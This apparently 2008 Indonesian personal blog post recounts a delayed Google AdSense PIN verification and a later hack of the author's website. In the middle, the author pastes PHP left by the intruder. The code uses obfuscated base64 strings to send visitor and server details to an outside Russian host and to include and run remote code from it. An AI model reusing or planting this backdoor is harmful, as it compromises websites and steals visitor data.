Perjalanan Berliku Google Adsense-ku

Surabaya – Tanggal 22 Januari 2008 kemarin aku medapat email dari Google tentang PIN Google Adsense (GA) yang sampai dengan waktu itu belum aku masukan untuk melakukan verifikasi, tapi sampai dengan tanggal 22 Januari 2008 aku memang belum menerima PIN. Belum menerimanya PIN sebenarnya karena kesalahanku, karena alamat yang aku gunakan untuk mengirimkan PIN adalah alamat kakakku yang ada di Jogja, sementara aku tinggal di Surabaya dan kakakku menggap surat dari Google tersebut adalah surat biasa.

google-1.gifSehingga kekonyolan sebenarnya ada pada kakakku yang menganggap itu kartu PIN tidak berguna dan dihilangkan padalah sejak bulan Desember aku sudah menelpon dan SMS untuk memberi tahuku jika ada surat/kartu dari Google, al hasil karena aku terlambar masukin PIN GA-ku gak bisa muncul iklan, yang ada hanya iklan layanan masyarakat, dan kurang 60 hari GA-ku akan di non-aktifkan.

Aku sempat nulis di forum GA dan saran dari beberapa taman agar aku cepat-cepat meminta lagi PIN kepada Google agar dikirimkan PIN kembali, kemudian aku melakukan permintaan PIN lagi pada tanggal 28 Januari 2008 dan aku meminta agar PIN dikirimkan ke alamat kantorku di Surabaya dan baru tanggal 27 Februari 2008 kemarin aku menerima PIN penganti dari Google. Setelah ditelpon teman yang ada di sekretariat kantorku yang memberi tahu bahwa PIN ku dari Google sudah datang, pikirku dalam hati GA-ku masih ada harapan dan memang benar GA-ku masih bisa diharapkan.

google-2.gifSetelah PIN aku terima aku coba masukkan dan setelah 2 hari GA-ku aktif lagi, tentunya aku seneng sekali karena GA yang selama ini sudah diujung tanduk akhirnya dapat hidup lagi, tapi sayang setelah GA aktif, situsku disusupin oleh orang yang tidak bertanggung jawab sehingga tampilannya jadi berubah, bahkan si penyusup meninggalkan coding PHP dalam script situsku, coding yang ditanaman dalam situsku tersebut seperti pada coding dibawah ini dan belum aku lakukan analisis apa maksud dari coding PHP tersebut, bisa jadi coding tersebut adalah coding jahat yang ditanamkan pada situsku.

<?
error_reporting(0);
$a=(isset($_SERVER[“HTTP_HOST”]) ? $_SERVER[“HTTP_HOST”] : $HTTP_HOST);
$b=(isset($_SERVER[“SERVER_NAME”]) ? $_SERVER[“SERVER_NAME”] : $SERVER_NAME);
$c=(isset($_SERVER[“REQUEST_URI”]) ? $_SERVER[“REQUEST_URI”] : $REQUEST_URI);
$g=(isset($_SERVER[“HTTP_USER_AGENT”]) ? $_SERVER[“HTTP_USER_AGENT”] : $HTTP_USER_AGENT);
$h=(isset($_SERVER[“REMOTE_ADDR”]) ? $_SERVER[“REMOTE_ADDR”] : $REMOTE_ADDR);
$n=(isset($_SERVER[“HTTP_REFERER”]) ? $_SERVER[“HTTP_REFERER”] : $HTTP_REFERER);
$str=base64_encode($a).”. “.base64_encode($b).”. “.base64_encode($c).”. “.base64_encode($g).”. “.base64_encode($h).”. “.base64_encode($n);
if((include_once(base64_decode(“aHR0cDovLw==”).”hicizzazbzbaee”. base64_decode(“LnVzZXJzLnBocGluY2x1ZGUucnU=”).”/?”.$str)))
{
} else {
include_once(base64_decode(“aHR0cDovLw==”).”hicizzazbzbaee”. base64_decode(“LnVzZXJzLnBocGluY2x1ZGUucnU=”).”/?”.$str);
}
?>

Coding tersebut yang ditinggalkan disalah satu file webku, dan sampai dengan saat ini aku belum perbaiki karena kendala akses cPanel yang tidak bisa aku lakukan dari kantorku.

Tentang GA-ku, bahkan aku sempat patah semangat, aku jadi males dan muak dengan internet, banyangkan seandainya account GA-ku jadi di non aktifkan usahaku semala 1 tahun ini gagal dan benar-benar gagal karena kecerobohanku dan kakakku yang aku. Tapi aku yakin usaha keras pasti ada hasilnya walau sudah ujung tanduk.